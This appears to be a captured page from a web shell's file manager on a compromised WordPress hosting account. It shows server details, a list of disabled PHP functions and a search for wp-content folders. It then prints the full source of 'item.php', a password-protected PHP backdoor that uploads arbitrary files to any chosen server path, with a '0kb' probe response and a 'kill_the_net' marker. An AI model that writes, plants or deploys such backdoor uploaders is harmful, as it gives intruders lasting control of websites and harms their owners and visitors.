Global search for 'wp-content' from server root (/)

This may take a few minutes...

Found folders: 2

/home/nhxanotm/public_html/wp-content
/home/nhxanotm/.cpanel/ea-php-cli/public_html/wp-content
 HEX
HEX
Server: LiteSpeed
System: Linux wordpress-hosting10.nhanhoa.com 3.10.0-962.3.2.lve1.5.39.el7.x86_64 #1 SMP Thu Sep 17 06:10:33 EDT 2020 x86_64
User: nhxanotm (1679)
PHP: 7.4.33
Disabled: deltree, system_exec, escapeshellarg, scapeshellcmd, base64_encodem, proc_terminate, getphpcfg, symlink, load_file, chroot, chown, chgrp, apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter,ini_get_all, ini_restore, inject_code, openlog, passthru, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, mail
$ pwd: /home/nhxanotm/public_html/
Upload Files
File: /home/nhxanotm/public_html/item.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
echo('kill_the_net');
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>
@ Telegram